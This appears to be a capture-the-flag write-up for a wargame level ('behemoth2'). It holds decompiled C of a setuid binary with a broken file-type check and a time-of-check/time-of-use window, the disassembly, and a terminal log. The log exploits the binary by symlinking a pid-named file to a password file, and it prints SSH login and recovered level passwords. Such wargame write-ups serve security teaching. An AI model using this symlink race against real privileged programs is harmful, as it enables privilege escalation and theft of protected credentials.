#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>
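int main(int argc, char *argv[])
{
    struct stat filestat;
    /* Holds "touch <pid>" and later "cat <pid>". 16 bytes leaves room for a
     * 7-digit pid (Linux pid_max); note that sprintf itself is unbounded. */
    char cmd[16];
    char *ptrpid = cmd + 6;     /* start of the decimal pid inside cmd */
    pid_t pid;

    (void)argc;
    (void)argv;

    pid = getpid();
    sprintf(cmd, "touch %d", pid);

    /*
     * Mirrors the binary (and $0xf000 / cmp $0x8000 on eax right after the
     * lstat call): the mask is applied to lstat()'s return value (0 or -1),
     * not to filestat.st_mode, so the condition is always true and any
     * existing entry named <pid> is unlinked and re-created. The intended
     * test was S_ISREG(filestat.st_mode). Even with that fix the path is
     * only inspected here and re-opened by "cat" after the sleep, so there
     * is a time-of-check/time-of-use window in between.
     */
    if ((lstat(ptrpid, &filestat) & 0xf000) != 0x8000) {
        unlink(ptrpid);
        system(cmd);            /* "touch <pid>" via the shell and PATH */
    }

    sleep(2000);                /* 0x7d0 in the binary */

    /*
     * Rewrite the prefix in place: "touch " becomes "cat   ". The binary
     * stores the 4-byte value 0x20746163 ("cat " little-endian), then
     * writes cmd[4] twice; the '\0' is a dead store immediately replaced by
     * the space. The pid at cmd + 6 is untouched.
     */
    memcpy(cmd, "cat ", 4);
    cmd[4] = '\0';
    cmd[4] = ' ';
    system(cmd);                /* "cat <pid>" with whatever privileges this process holds */
    return 0;
}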
栈环境
root@today:~# ssh behemoth2@178.79.134.250
behemoth2@178.79.134.250's password: eimahquuof
behemoth2@melinda:~$ cd /tmp/shui2
behemoth2@melinda:/tmp/shui2$ ls
behemoth2@melinda:/tmp/shui2$ /behemoth/behemoth2 > passs.txt &
[1] 32634
behemoth2@melinda:/tmp/shui2$ ls
32634 passs.txt
behemoth2@melinda:/tmp/shui2$ rm -f 32634
behemoth2@melinda:/tmp/shui2$ ln -sf /etc/behemoth_pass/behemoth3 32634
behemoth2@melinda:/tmp/shui2$ ll
total 1692
drwxrwxr-x 2 behemoth2 behemoth2 4096 Feb 18 04:52 ./
drwxrwx-wt 9354 root root 1724416 Feb 18 04:52 ../
lrwxrwxrwx 1 behemoth2 behemoth2 28 Feb 18 04:52 32634 -> /etc/behemoth_pass/behemoth3
-rw-rw-r-- 1 behemoth2 behemoth2 0 Feb 18 04:51 passs.txt
behemoth2@melinda:/tmp/shui2$ ./sleep.sh
...
sleep 2409 sec.
sleep 2410 sec.
sleep 2411 sec.
^C
[1]+ Done /behemoth/behemoth2 > passs.txt
behemoth2@melinda:/tmp/shui2$ ls
32634 passs.txt sleep.sh
behemoth2@melinda:/tmp/shui2$ cat passs.txt
nieteidiel
┌─────────────────────────────────────────────────────────────────────────────────┐
│0x804856d <main> push %ebp │
│0x804856e <main+1> mov %esp,%ebp │
│0x8048570 <main+3> and $0xfffffff0,%esp │
│0x8048573 <main+6> sub $0xa0,%esp │
│0x8048579 <main+12> mov %gs:0x14,%eax │
│0x804857f <main+18> mov %eax,0x9c(%esp) │
│0x8048586 <main+25> xor %eax,%eax │
│0x8048588 <main+27> call 0x8048410 <getpid@plt> │
│0x804858d <main+32> mov %eax,0x1c(%esp) │
│0x8048591 <main+36> lea 0x24(%esp),%eax │
│0x8048595 <main+40> add $0x6,%eax │
│0x8048598 <main+43> mov %eax,0x20(%esp) │
│0x804859c <main+47> mov 0x1c(%esp),%eax │
│0x80485a0 <main+51> mov %eax,0x8(%esp) │
│0x80485a4 <main+55> movl $0x804870c,0x4(%esp) │
│0x80485ac <main+63> lea 0x24(%esp),%eax │
│0x80485b0 <main+67> mov %eax,(%esp) │
│0x80485b3 <main+70> call 0x8048450 <sprintf@plt> │
│0x80485b8 <main+75> lea 0x38(%esp),%eax │
│0x80485bc <main+79> mov %eax,0x4(%esp) │
│0x80485c0 <main+83> mov 0x20(%esp),%eax │
│0x80485c4 <main+87> mov %eax,(%esp) │
│0x80485c7 <main+90> call 0x80486c0 <lstat> │
│0x80485cc <main+95> and $0xf000,%eax │
│0x80485d1 <main+100> cmp $0x8000,%eax │
│0x80485d6 <main+105> je 0x80485f0 <main+131> │
│0x80485d8 <main+107> mov 0x20(%esp),%eax │
│0x80485dc <main+111> mov %eax,(%esp) │
│0x80485df <main+114> call 0x8048400 <unlink@plt> │
│0x80485e4 <main+119> lea 0x24(%esp),%eax │
│0x80485e8 <main+123> mov %eax,(%esp) │
│0x80485eb <main+126> call 0x8048420 <system@plt> │
│0x80485f0 <main+131> movl $0x7d0,(%esp) │
│0x80485f7 <main+138> call 0x80483e0 <sleep@plt> │
│0x80485fc <main+143> lea 0x24(%esp),%eax │
│0x8048600 <main+147> movl $0x20746163,(%eax) │
│0x8048606 <main+153> movb $0x0,0x4(%eax) │
│0x804860a <main+157> movb $0x20,0x28(%esp) │
│0x804860f <main+162> lea 0x24(%esp),%eax │
│0x8048613 <main+166> mov %eax,(%esp) │
│0x8048616 <main+169> call 0x8048420 <system@plt> │
│0x804861b <main+174> mov $0x0,%eax │
│0x8048620 <main+179> mov 0x9c(%esp),%edx │
│0x8048627 <main+186> xor %gs:0x14,%edx │
│0x804862e <main+193> je 0x8048635 <main+200> │
│0x8048630 <main+195> call 0x80483f0 <__stack_chk_fail@plt> │
│0x8048635 <main+200> leave │
│0x8048636 <main+201> ret │
└─────────────────────────────────────────────────────────────────────────────────┘